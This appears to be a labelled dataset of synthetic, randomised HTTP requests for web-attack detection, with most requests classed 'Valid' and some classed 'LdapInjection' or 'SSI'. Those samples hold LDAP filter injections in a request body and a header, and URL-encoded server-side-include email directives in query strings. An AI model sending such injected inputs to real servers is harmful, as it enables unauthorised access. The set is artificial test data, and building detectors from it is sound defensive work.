Upgrade: coeeIl/9.2, natae/9.1, hi4/9.9, 3tu3nt/4.6, epa5c/2.6
Warning: 674 28.181.161.239 "fsbetechtt6msa4eu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 87791101469123011682
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44281
Start - Id: 29027
class: Valid
GET /nx6tYit/tWnoqOFwXFMQm3/noLui8nnT1jX6p96Oa/ap3I@5ZB3AzIJ2xN/iynoytunyeyN4y/spaXWCxnbZrvpnO9/e5ydookne/CkkLR0XQQTjRAP0/iPx-jTCa1_u1xAVHj6/8b@Yh.-hO6z.dll?CYr6Q=53&fzJ@dU=795890815&wzacRBtt3hhou1t=dRhc%2FreoR4t&EDcsma0bc=dbajlMc&CzHW=158869&WKpN@nzo4J=titRM&insertkSvWpMwL=sEnJe&cslhpS7=26574&tat2t=%26&-iL9.mwinntjiL76=wemaiaoehracgsset&htoeDf=526235 HTTP/1.1
Host: 69.39.101.125:80
Connection: aeran
Accept: */*;q=0.7
Accept-Charset: iso-8859-5;q=0.6, windows-874, isiri-3342;q=0.2, cp-950
Accept-Encoding: identity, compress, identity;q=0.3, gzip, identity;q=0.5
Accept-Language: icaen-t7ytcee;q=0.1, 1ntj-t7ph, g-lsb3aE, nigmwgU-r;q=0.5, mE-tnOedo;q=0.8
Cache-Control: max-age=969
Client-ip: 213.215.107.144
Cookie: sgecoanD=w;irrlihiCitF=48spT0DN7;t6eP=b:system'h
Cookie2: $Version="6"
Date: Fri, 14 May 04 21:07:16 GMT
ETag: W/"E1PsNYHqAeuMenzMDzx"
Expect: 100-continue
From: te6nde@Ieee0ntr7.net
If-Modified-Since: Tue, 02 Nov 04 07:42:21 CET
If-Unmodified-Since: Thu, 07 Jan 10 15:45:37 CET
If-Match: "m.0FYFeT1QEgffjXPb"
If-None-Match: "jKEPDUL5wYHfszpubFSV"
If-Range: Wed, 26 Nov 08 04:45:22 GMT
Max-Forwards: 8616
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM aW9ublVyaGllb0pybHB6ZWFtcW5zcHJZTmFoYWR0bmo2aGduMXNoaW9x
Authorization: Basic bmkwZWVlaTpsdGVo
Range: 3-,5985-7558,753-
Referer: http://RaR4dg.uk/marebc.htm
TE: deflate;q=0.4
Trailer: Connection
User-Agent: tesiotna
UA-CPU: x86
UA-Disp: 6183,441,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 694x8428
Via: FTP/2.1 www.orb8Mr.css:682
Transfer-Encoding: deflate
Upgrade: hoyban/5.3, e7nm/6.7, idsix/6.8, nehEgh/3.6
Warning: 992 www.ntgo3cv.htm "seCcmng" "Wed, 13 Apr 05 13:20:02 CET"
X-Forwarded-For: 157.73.34.25
X-Serial-Number: 055751373307057
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29027
Start - Id: 29369
class: Valid
GET /U42/EQnin-@h5V5/uX5.msf?lgselecty64=%2FLa&ehCxsis=agawef&esaoltNEt6l=87239910&lsr=7495074219&Ifr.TXdFYet=oie+e&WLPmailg4WG=1958629&nbro=beeo2aRg&BbOX22LsFJCl=tAIEyOscx&pm=OjstylesidJs8ic&Sgoleeityatbi=tietrfh&opthmntit=elb&zwS4=7e&arw=ge7&ta=9082838957 HTTP/1.1
Host: www.iaalpae.fr
Connection: close
Accept: */*
Accept-Charset: windows-1251, windows-1250;q=0.2, x-mac-icelandic;q=0.4, x-mac-greek
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: ieeh6Kre='is2hu'
Client-ip: 89.70.83.39
Cookie: gtdkstfnsa=e5O_Da
Cookie2: $Version="515"
Date: Wed, 06 May 09 18:04:36 GMT
ETag: W/"WuxST4MU6LWxePAFY"
Expect: qyNg=hhn7uhyi;ssclt
From: muhbsl@whsoklhxlr.org
If-Modified-Since: Sun, 21 Sep 08 21:49:42 GMT
If-Unmodified-Since: Sat, 07 Jan 06 07:15:49 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 17 Aug 08 21:33:35 UTC
Max-Forwards: 5076
MIME-Version: 3.1
Pragma: ao1taif=mceyuqsc
Proxy-Authorization: NTLM dGR4SWw0YzQ1ZTNvbnJxRW5udWFjb2FsbWVuYzNyaW53ejM3dGVyclZzdG53Y3E=
Authorization: n3rh tito9edy=citaera
Range: 7-996,-9265,37321-
Referer: /tpuiibia.pl
TE: chunked;q=0.4,deflate
Trailer: Accept-Charset
User-Agent: sloeoaclh (sy_wcb; rxoBaS5; eBQQdTt; oYPH-l; uexKgq3mF)
UA-CPU: StrongARM
UA-Disp: 468,4853,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 2199x7171
Via: 7.0 157.44.162.25, chqiho/8.9 www.jgsi.tiff, HTTP/2.4 252.159.162.239
Transfer-Encoding: gzip
Upgrade: c6ta/1.8
Warning: 369 99.232.247.89 "tt4ao8Ao9o1ecNBed" 
X-Forwarded-For: 10.176.141.74
X-Serial-Number: 725402
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 29369
Start - Id: 19071
class: Valid
GET /hTb8/eyA4-IkEc.gif?c3tlnefsrEOe=+a6%3FoVc&dcE=tc%3D%3C&fre=nprocessing-instruction3+c-ytqa3hi4sym&tyebuxa=n%7Ep%40%5Cg HTTP/1.0
Host: 249.235.3.111
Connection: abtea
Accept: image/*;q=0.8, application/x-tar, video/quicktime
Accept-Charset: hz-gb-2312;q=0.3, cp-936, us-ascii, shift_jis;q=0.1, iso-8859-15;q=0.9
Accept-Encoding: gzip, gzip
Accept-Language: aAepasaj-lsoaTs, tg-3hETe, ue1al-arkroipg;q=0.6, 9eo3-9hRo;q=0.1
Cache-Control: only-if-cached
Client-ip: 115.12.86.200
Cookie: ntifee=6194130;ehnodsbnsu==eaIn(iaexecy7+libwe61E;txeee1hatCge=m1UV07;9XMLHQJ=sieeuh;ecttOf9Alr4wb=hsVRwcmOZSJ
Cookie2: $Version="27"
Date: Fri, 08 Jul 05 05:03:14 GMT
ETag: W/"lGyFmsGG_GC7-HnK"
Expect: 100-continue
From: M8nttHeh@smccgn.org
If-Modified-Since: Fri, 07 May 04 19:31:57 CET
If-Unmodified-Since: Fri, 04 Sep 09 09:36:18 GMT
If-Match: "fiRXI_qr84g-76W@oJ1"
If-None-Match: *
If-Range: Fri, 06 Oct 06 10:06:46 CET
Max-Forwards: 7
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM NHBwdDFldGVlaXQxbm1nb3J0SXRobnlubnRyczV0ckFobmhlYQ==
Authorization: Basic a2VtbTplcmlhc3R0
Range: 0-122,891-2377,320-202511
Referer: http://su1n5jaa.uk/8rrttoa/1iro/ko9g.php4
TE: gzip;q=0.0
Trailer: Date
User-Agent: Mozilla/4.4 (Windows; U; Win 9x 4.7; ne-eo; rv:1.2.2) Gecko/21399062
UA-CPU: MIPS
UA-Disp: 603,8155,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 323x8856
Via: qEherc/6.5 www.mehedi.jpg, HTTP/7.7 27.222.99.19, 5.5 www.f3Vfz.png
Transfer-Encoding: deflate
Upgrade: Nini/5.2, 1Sitkn/4.6
Warning: 342 204.151.63.29 "ebtn0ofEoku" "Fri, 09 Oct 09 08:23:52 CET"
X-Forwarded-For: 203.182.207.188
X-Serial-Number: 594077
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 19071
Start - Id: 27929
class: Valid
GET /sLggD2TWq@2Z/lsl/rUMopjUby9FWCW/@pa0/lFWxJE0Py/phpaD-VIGae/binPhv.js?roerntn81ths=072107&hy3eenrsWxeruai=t6usthe%7ErzaehEPd&zeogo6gvoAdhllI=sFphpe&rreAaoe9nT=tnmmkeeiied&ycmer5yctyn=h8wknDmQyU&dS9nrpEExeett=s%5Ci%27nellys%3Cdltn%254 HTTP/1.0
Host: www.GhieajoCe.biz
Connection: close
Accept: text/*, application/rtf
Accept-Charset: iso-8859-8, x-mac-roman
Accept-Encoding: 
Accept-Language: 9aEIei-Lsopse;q=0.4
Cache-Control: no-store
Client-ip: 228.43.186.124
Cookie: edozswitT0tgr=htbCpiuca4mnmlfe
Cookie2: $Version="67"
Date: Tue, 20 Feb 07 14:50:59 UTC
ETag: "lqhtxrV1IHiT76QZs4F@"
Expect: 100-continue
From: oexvSeVB@ohat.biz
If-Modified-Since: Sun, 18 Jun 06 10:32:50 UTC
If-Unmodified-Since: Sun, 05 Jul 09 10:47:53 CET
If-Match: *
If-None-Match: "H57c2nQtuwup@WJtwy"
If-Range: "sUb-tYVH8G@AphhM"
Max-Forwards: 15
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest username="8zR2"
Authorization: NTLM R2VsbmFldWh0ZXluc203bnlpaXJjdnNubHR0dEhobVNz
Range: -14621,-370256
Referer: http://rctmhrn.net/2rdo.tar.gz
TE: trailers,trailers,chunked
Trailer: If-None-Match
User-Agent: Mozilla/5.9 (compatible; Konqueror/5.6; Mac OS X; lRaoqs7rce)
UA-CPU: Sparc
UA-Disp: 3738,726,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4388x7796
Via: 4.7 234.143.98.38, 7.1 188.115.241.92
Transfer-Encoding: deflate
Upgrade: aI3m/4.0, ren/5.5, io2vsE/7.5
Warning: 133 www.lJae.css "ewiowestteogamnuhux" "Sat, 06 Oct 07 10:45:03 CET"
X-Forwarded-For: 122.177.179.211
X-Serial-Number: 149066712456
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27929
Start - Id: 37509
class: LdapInjection
PUT /muT%uXjgY/f-DOfDY7_G0ECAy-P-ME/O8echo9fvark.php4? HTTP/1.0
Content-Length: 275
Content-Language: a0heci9r,cdirt8so
Content-Encoding: identity
Content-Location: http://www.dpee3t.org/nvshoaE/w6een4.pl
Content-MD5: RUlubGFlQzRpYWNhVGhybA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Aug 06 04:01:13 UTC
Last-Modified: Mon, 18 Apr 05 15:28:12 UTC
Host: 48.227.88.35
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 56.86.55.164
Cookie: weLjorsgo=650;o2y1t=1131;7ttfNarfditI=3781683;lxsaytth45=h0iufTnoeeocr3vuRs;IeocsgraEff=Ia8eEssNheem0ori;C7dprma=51024
Cookie2: $Version="089"
Date: Tue, 09 Dec 08 06:44:38 CET
ETag: "DVOl143jke2PWR-a"
From: t7in1r0e@I35dntt6be.fr
If-Modified-Since: Sun, 17 Jun 07 11:07:58 UTC
If-Unmodified-Since: Sat, 16 Jan 10 09:05:33 GMT
If-Match: "2OXUy@isxIG12HWm"
If-None-Match: *
If-Range: Sun, 03 Oct 04 03:29:53 CET
Max-Forwards: 472
MIME-Version: 0.6
Pragma: mbfulq=satadsm
Authorization: Basic b2xvbDQ6b2Vnc25I
Referer: /ybieE/ink2shev/o2soyi.sh
TE: trailers,chunked;q=0.6
Trailer: Expect
User-Agent: otlhGhrulor8sti
UA-Pixels: 2665x9772
Transfer-Encoding: deflate
Warning: 173 www.uucurht.tiff:45369 "maaas3dCteAprn" 
X-Serial-Number: 4606842395290054569

34eetSe8ngejt=2481203&Ldq3umUesmgic=dde&vSnuRtrr43=)  ( |    (displayName=had*)    (name=    had*   )(    mail=had*   )&hv=98280612&NnraaEzeupnord=47671&6eBhjshShy=3d3itu5Jh 0aa9a&0Ttltn8untnced=d tet&leoagecp=uauo&VrFXyvoQJl=deoq6f<fperlreplacefror

End - Id: 37509
Start - Id: 34788
class: Valid
POST /gnxsOXz/v-avyeci3_6ALwgC.dll? HTTP/1.0
Content-Length: 262
Content-Language: zus,h25i
Content-Encoding: identity
Content-Location: http://tkneh.gov/mguc4y/cz2mso/ovy4/ettxbeno.rar
Content-MD5: ZTVoc3hsbmVucmxwRXJyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 06 Aug 09 05:12:17 UTC
Last-Modified: Tue, 08 Sep 09 12:16:24 UTC
Host: 42.227.190.84:90
Connection: keep-alive
Accept: audio/*, image/jpeg
Accept-Charset: isiri-3342;q=0.1
Accept-Encoding: *;q=0.8
Accept-Language: 0-uLmnaeoo, ea-o3m
Cache-Control: B='ticaus5'
Client-ip: 100.1.231.182
Cookie: CJidopenl=08246;rTya=mswvwretTuue
Cookie2: $Version="7"
Date: Sun, 31 May 09 23:43:57 UTC
ETag: "OeWeq0YsatJXLYdH"
Expect: 100-continue
From: idbn@itnhem.uk
If-Modified-Since: Sun, 22 Nov 09 11:48:10 GMT
If-Unmodified-Since: Wed, 06 Sep 06 17:35:59 GMT
If-Match: "22wij@KujIhinH7yWNL"
If-None-Match: *
If-Range: *
Max-Forwards: 8919
MIME-Version: 7.2
Pragma: hc='noomn'
Proxy-Authorization: Digest opaque="eRl54bWu"
Authorization: si7hih ruihl=srkaSe
Range: -32368,1-
Referer: http://www.aItrenss.be/tOjitta/ohocaala/e4eadne.htm
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/3.6 (X11; U; Linux i586 8.5; dl-5e; rv:2.3.8) Gecko/46449172
UA-CPU: x86
UA-Disp: 232,5423,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 262x4505
Via: 8.1 www.geerrruw.tiff, uraghc/4.7 www.bdal.jpeg
Transfer-Encoding: gzip
Upgrade: nua/5.0, lie/6.6, on7/3.1
Warning: 938 www.isiGfs.shtml "hHns1nh" "Wed, 20 May 09 08:56:42 CET"
X-Forwarded-For: 172.233.127.122
X-Serial-Number: 438515700357527
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iodetet6=hmium&s4yl=cAbyIMYHhar6&srnayei=1Q6e?3&jh44=tBFznDP48k&nn7paicoaminow=himgane&bgteAntajh=in]+)udni&OjIc=rxl0zr5R9bHx&rdpszdoshC3h=n_6I&dlt0dia=18916&sbfnlwohTT=3297024451&KfA@jPM=285350&r1Ascript=684&io=r;s winntybedad=edrophgnuei&aea=hBg6N3

End - Id: 34788
Start - Id: 14534
class: Valid
GET /aoahktca/FJB81access_logO@/i5GqhJE_l7ZS@srB220/aki/oNZCCj6/tPxRnJb4LIHJriEm@6B.gif? HTTP/1.1
Host: www.rOandtubi.fr
Connection: keep-alive
Accept: video/mpeg;q=0.4
Accept-Charset: utf-7;q=0.7, windows-1258, iso-8859-9;q=0.1
Accept-Encoding: 
Accept-Language: fhEns-liah, ocbeio-8pks5i;q=0.5
Cache-Control: lreraxl=pw8egeS
Client-ip: 162.156.75.53
Cookie: ulhhaeLRtlyiboe=wherep;oluhhHuNca=otfAs;pac0=arongmtss4exdli;jUenadOd=dMU1;ham0T=06;nis1llt0y7euwr=010
Cookie2: $Version="5"
Date: Mon, 23 Oct 06 21:04:11 CET
ETag: "vCcBAqRPR5i-s-_Kr@S"
Expect: dfuOmt=Nehn4
From: vevejh@0Noynt.net
If-Modified-Since: Thu, 23 Mar 06 23:36:33 GMT
If-Unmodified-Since: Thu, 06 Aug 09 01:20:52 CET
If-Match: *
If-None-Match: "YoceqO.QyY51rX6wiK"
If-Range: Thu, 28 Oct 04 07:43:17 UTC
Max-Forwards: 8
MIME-Version: 4.2
Pragma: tkcih9e='lt'
Proxy-Authorization: NTLM aHl0dGVUYWJlbm9vbEFycmlzZGJhb3V0NjJ6aG9hVW9yZWxtdGV3YXVoNW8=
Authorization: Basic ZGdlOTppdHNxcw==
Range: 4019-22,-23,269-5
Referer: http://4dheusiv.cz/hInV/rd36o/aeslqt.mpeg
TE: deflate;q=0.7,gzip
Trailer: If-Range
User-Agent: spenieh/4.0.8
UA-CPU: x86
UA-Disp: 419,862,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3486x145
Via: FTP/8.7 www.rflehb.css, HTTP/1.7 www.tarnan.jpeg, 5.7 www.pwFnngEs.jpeg
Transfer-Encoding: deflate
Upgrade: deoC/9.0, lnte1/6.7
Warning: 202 www.tceh.js "i3meintolnieF2asaend" "Wed, 08 Feb 06 16:32:21 GMT"
X-Forwarded-For: 152.218.118.157
X-Serial-Number: 267686461
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14534
Start - Id: 39263
class: SSI
GET /gspk_Ke8jenYN/eap@050hxe.NkQC/rroslSetteee3hsb/tabtt/vM50N60dSV_blreplace/ev/t6eqsihsadnha/edstLEe/d4lCm/ceo/1tt2sy4mozeTig.htm?obatlistso0op=U4es+sSoremru%3Bn&e4ayn=643&iivclbioLhessro=599999&o8iyAnoipo2s=94044654&ud=copyradxerea+tis&tesecnatwt=osbt3sOltDee&ldrSeE=eyo&x6etc_fXunF=91875660&mt=%40&glog0xp_e1T3t=%3C%21--%23email+fromhost%3D%22www.iay9tmr5.com%22+tohost%3D%22mailbox.ive.com%22+message%3D%22ssln0c+bsylu7+ei+qeQn%22+fromaddress%3D%22gleiea.com%22+toaddress%3D%22btHm.sthr.com%22+subject%3D%22ft%22+sender%3D%22ea3U.com%22+replyto%3D%22SueSsi.com%22+cc%3D%22sng%22+inreplyto%3D%22gC+wTzt+p%22+id%3D%22lrmail%22+--%3E&8xuBS_=0%2F9%5Dionc%27tnt&Sico7eSsbrvrt=lil0stqdeaha&QXfautoexec3YBhncL9=rwherea1&epdmrselnGeoo=tsepf8aodswd6sd&M@v4FCn=7rayrt0eKreen HTTP/1.1
Host: 27.162.16.3
Connection: keep-alive
Accept: image/gif;q=0.6, image/gif;q=0.9, image/png
Accept-Charset: x-mac-hebrew;q=0.3, iso-2022-jp, windows-1250, koi8
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=45
Client-ip: 154.176.125.112
Cookie: trSsoetn7=7ea8l;ec=hnPg
Cookie2: $Version="81"
Date: Wed, 28 Apr 04 17:28:44 UTC
ETag: W/"pa00PH_QOgAMJ0YO8_"
Expect: tnhoioon=ntmu;ndEx1r
From: ogpe@eKhmc.uk
If-Modified-Since: Mon, 19 Jul 04 19:47:23 UTC
If-Unmodified-Since: Mon, 05 May 08 10:30:15 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Feb 07 02:24:12 CET
Max-Forwards: 35
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: Digest opaque="ulDh"
Range: 864-,5323-,-8736
Referer: http://i2eupa.org/oc9zhta/zxeo/r112/ror7ius.sh
TE: gzip,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/1.8 (X11; U; Open BSD i586 4.9; rq-sU; rv:4.2.5) Gecko/12733005
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8684x662
Via: 2.4 www.l4t0snar.shtml, FTP/2.8 www.laped.shtml
Transfer-Encoding: deflate
Upgrade: 8gtyn/7.7, ttdrko/9.1, 7yofs/9.0
Warning: 014 58.200.111.202 "ltrIo" 
X-Forwarded-For: 237.101.171.41
X-Serial-Number: 2940498240401251
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39263
Start - Id: 39273
class: SSI
GET /tmiG-x1ex/i-VCTnTO2XHT/jarus3HXggotmwt1uoio/1aUg4huIxeoel/h1UVP2JWt2wQk.yXX1/bcvEbfHstadfnay0i/TmaULC3YtFyhttp/fqn3hnh/eZFUTpKj9.mdb?tiie=%3C%21--%23email+fromhost%3D%22www.atHivufI.com%22+tohost%3D%22mailbox.rbyo.com%22+message%3D%22tinono+olenrtb+3rrashhb+i9p%22+fromaddress%3D%22d3iti.com%22+toaddress%3D%22kdmtc.lHes.com%22+subject%3D%22l3t%22+sender%3D%22wo.com%22+replyto%3D%22qlofoad.com%22+cc%3D%22kaB8%22+inreplyto%3D%22eagEr+Hqao+das%22+id%3D%22tdbpmail%22+--%3E&anczG=1973&hPsxnagloenyh=hy7%40%2F5&ovnspoblTI4k=2 HTTP/1.1
Host: www.r4dow.gov:80
Connection: close
Accept: image/gif, image/*;q=0.5
Accept-Charset: windows-1257;q=0.7, iso-8859-5, windows-1253, cp-932
Accept-Encoding: identity, compress;q=0.7, identity;q=0.8, identity, gzip;q=0.5
Accept-Language: 6-si, n6a-u9rrng;q=0.6, eeif-ge9;q=0.9, 9a3v-ar
Cache-Control: max-stale
Client-ip: 92.21.223.247
Cookie: ol=8e
Cookie2: $Version="26"
Date: Sun, 13 Jan 08 18:38:31 UTC
ETag: "MZdeow9n9NsU3XiC@nF"
Expect: tGnf1g=pja2z2le;grncwlo=gs7s
From: oshte@8ntoethSro.uk
If-Modified-Since: Sun, 23 Dec 07 14:29:02 GMT
If-Unmodified-Since: Sun, 18 Dec 05 03:53:40 CET
If-Match: *
If-None-Match: "RwjmJJj2ALUSTD7yxPQz"
If-Range: Thu, 13 Jan 05 13:47:53 GMT
Max-Forwards: 0769
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: NTLM dEVldWpycHRvZW50ZXpicHNtZXN4b2Vpdm50bjdobmFidQ==
Range: -219632,263179-06080,264504-7
Referer: /tuianw/NStetla/ort1.png
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/8.7 (X11; U; Open BSD i586 9.1; be-ao; rv:5.9.2) Gecko/45089969
UA-CPU: MIPS
UA-Disp: 844,3342,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 320x017
Via: FTP/4.4 www.7stn.png:0, pbpm/4.8 www.ccahse.css
Transfer-Encoding: gzip
Upgrade: etsi/0.2, 42Nn/6.7
Warning: 014 58.200.111.202 "ltrIo" 
X-Forwarded-For: 34.130.240.220
X-Serial-Number: 04901
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39273
Start - Id: 39024
class: LdapInjection
POST /x.8MHpuB-Ha878YeW2/tsorna/aio/cMhDegefd4lgeaduC/teiclepbwnpOeil4ST5/e8OX.pl? HTTP/1.1
Content-Length: 201
Content-Language: e,ateo0eNc,mbaEr6
Content-Encoding: gzip
Content-Location: /hlzan/hHeR/m3kn/zghej/Mdaefrsn.cfm
Content-MD5: c3QwRWF0dG9ucmFyZTlvcg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Thu, 18 Aug 05 04:18:25 GMT
Host: www.v2gische.st:5
Connection: lravu
Accept: video/mpeg;q=0.1
Accept-Charset: *
Accept-Encoding: identity;q=0.7, compress;q=0.4, deflate
Accept-Language: )(  |  (npea=rhroa*)
Cache-Control: no-transform
Cookie: 2shhnfdhcE=tstokt
Cookie2: $Version="735"
Date: Tue, 06 Apr 10 07:06:52 UTC
ETag: W/"JI-sDc0GZjI1V8R"
Expect: iohean
From: atitro@THsros.uk
If-Modified-Since: Sat, 02 Aug 08 18:27:44 GMT
If-Unmodified-Since: Thu, 06 Aug 09 21:18:54 CET
If-None-Match: *
If-Range: Tue, 08 Dec 09 10:54:36 GMT
Max-Forwards: 4097
Pragma: He=shasqe
Authorization: NTLM ZWVkVGFsbmFvMG1tdHA1ZGZhZGhuM2F0aHM0aTdpYWlydA==
Referer: http://feoayr.ch/o4sdm8o/dksC/8rhhhuez.tiff
TE: gzip;q=0.6,deflate,trailers
User-Agent: hrgvTdhJzae
UA-Color: color32
UA-Pixels: 5841x328
Via: 1.4 236.69.80.177
Transfer-Encoding: compress
Upgrade: aoese/7.7, il7/0.0, iNtwe/2.8, ofsd/5.6, naOq/0.5
Warning: 567 124.96.152.130:6746 "eurcdoMnES" 
X-Forwarded-For: 19.167.50.215
~~~~~: ~~~~~~~~~~~~~~

3SeeiaoerIyh7i=40204&4xWNLhe=9501691&3epeoeeTh8Iae=91572809&6e1let8pisheo=84815226&Rjoe2rsHtp2l=20272&nlirBaiahnmc=ys2s6ngiirem3h&Umdas8aeeoitr=pk3rmilet4ol19rTxo&imgPadminM2m5=1E5sdo&z5WtVDQptB69=0419

End - Id: 39024
Start - Id: 28654
class: Valid
GET /Voaetyprm8dwsoedy3e/eWAJTD-oIjhtC/Ta/iPArjJUtYxm7Wt3nb8/eOQwtNQMxoPaKcOHIA3t/lxRXRUk_Y8Z/Redatiey9m9fshnoseto/f7/a4yOX/nRN/8copysqZTxroptw/t6tHIPE0.ms2ia8.png?aw5h8=s&ttaoNs9aRaeEa=6Oqb%40kh.9&eeLwoDottig2q=c8uat52u&ry=2606&JBruZVY=153278&window.open8QXrm7B=chu&lnramun0Te=%26Eo0&HaMrirroi=%2Fo&opty@dexecKd=36075&RMVl@=830&qqsteieuae=ho%3Fgrot%3Abrc%2BahUsystemle&AhlAe0sDjusnhee=ov&R53htmpgroup by=o1ee0c+tonraaue&aead0teTiiions=%28aHeaetxoanibf&qnrtkn8nbe=operlao%2B2%5Bgl+oh HTTP/1.1
Host: www.i0ietn.it:63
Connection: close
Accept: audio/x-wav, video/mpeg
Accept-Charset: koi8, x-mac-arabic;q=0.7, big5, hz-gb-2312;q=0.0, cp-932;q=0.5
Accept-Encoding: gzip
Accept-Language: be4ael-it;q=0.7, ie3ogfy-Amss
Cache-Control: max-stale=5081
Client-ip: 255.113.218.101
Cookie: 8wefogem3r=ce ;7Cpmoey=456l;aihibmagei1nCs=475650;eAeodsmydp=jb5giframeo;q_s3tmpzX.Op=dWFMXXwl2d;dpl=iN
Cookie2: $Version="2"
Date: Fri, 17 Apr 09 05:20:35 CET
ETag: W/"I34Cb9.h-BI0R6UFAmYR"
Expect: eugrer
From: tosers@epppo9rd.biz
If-Modified-Since: Sat, 21 Feb 04 10:31:34 CET
If-Unmodified-Since: Mon, 13 Oct 08 02:05:28 UTC
If-Match: "vRw_O@AgYwe.vuJ"
If-None-Match: *
If-Range: Thu, 19 Jun 08 10:30:07 GMT
Max-Forwards: 271
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest response="EAedb1b32Dc3382D2AdE19cFCab7Ee47"
Authorization: Basic c2l0ZHpvY3Q6Z3RuVzc=
Range: 1908-
Referer: http://9S8defe.ch/asas/aIette/Tedi.cfm
TE: trailers
Trailer: Date
User-Agent: Mozilla/1.0 (Machintosh; U; PPC Mac OS X 6.9; nx-ni; rv:9.7.9) Gecko/71246882
UA-CPU: 68000
UA-Disp: 670,5224,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9872x6402
Via: 6.7 www.onpagg.png
Transfer-Encoding: deflate
Upgrade: tsSmni/9.1
Warning: 059 www.lnimpsEi.shtml "oaE5stj9AFde" 
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 6125410467694
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28654
Start - Id: 14932
class: Valid
GET /3Nr3IcatnCCYUzimg/tKnHm-bMWN0eV7GakJ/ST-xC@CuNrZ/n2tnDism/tnwj0h/sOh/inVd5/91Qt6G/aune3ixadenw8u/taaoiyprdiNsy.js?riizcRph2tiEa=O%7C%2B%5CreoncttAy&egiim=lnu&ksnsTtn6i=logiiob&sOpa5sen=mnuo&pvctm=wyc&QYIservicesFnMIN=%3Dhtpass&tees0taSsesa80R=replaceeh17%2Fscdropco&eas=eb%5C%7CR6t+system&topnmrhHno=hOmtohbdwo&elliy=hhdbB%40s2FyGP&wWo1=4207&teille4h=0 HTTP/1.1
Host: www.uEmdtoa.de:95061
Connection: close
Accept: image/jpeg, text/*;q=0.7, application/*;q=0.2
Accept-Charset: iso-8859-15;q=0.7
Accept-Encoding: *
Accept-Language: nwt-n, t5-3, qrtbqex-ouu, l-ses9nyi;q=0.8, qfjeo4io-s;q=0.3
Cache-Control: only-if-cached
Client-ip: 210.67.84.109
Cookie: Raw69aimIfesEh=321;qQFsUMsxY5.=lTi;eprIleAH=rdoa1kotvec9ay;8ck3elTEt3ryA=tb@
Cookie2: $Version="3"
Date: Sun, 01 Nov 09 02:50:24 GMT
ETag: "Eqkqz0JEfC1NW7cpl"
Expect: 100-continue
From: oate@atmthod.ch
If-Modified-Since: Sat, 04 Jul 09 16:56:43 CET
If-Unmodified-Since: Fri, 27 Mar 09 01:26:49 UTC
If-Match: "BD681Bk-Wv1@KiH"
If-None-Match: "glSjihKYJg3U@44CUF8"
If-Range: *
Max-Forwards: 31
MIME-Version: 8.7
Pragma: s='mr'
Proxy-Authorization: Basic c3RlYmlPOm5lYWVlamVz
Authorization: Basic bXluNEVlbzpldDVnMGF4Zg==
Range: 19024-74,-1374,-1
Referer: /Apid/ntmk7yie.php
TE: gzip;q=0.4,gzip,trailers
Trailer: Expect
User-Agent: Mozilla/7.4 (Machintosh; U; PPC 3.7; eE-0m; rv:5.8.2) Gecko/59557159
UA-CPU: PowerPC
UA-Disp: 482,331,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6967x560
Via: 5.7 www.keaonoN.htm, 1.0 www.eke1oep.gif
Transfer-Encoding: identity
Upgrade: Wakot/1.1, 8tc3d/0.8, aaaaNa/9.3, nem/3.6, t9l/3.8
Warning: 194 www.rm0lai.jpeg "gocxkLhNTt9pfsEbecg" 
X-Forwarded-For: 124.227.211.95
X-Serial-Number: 51313390873628125654
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14932
Start - Id: 788
class: Valid
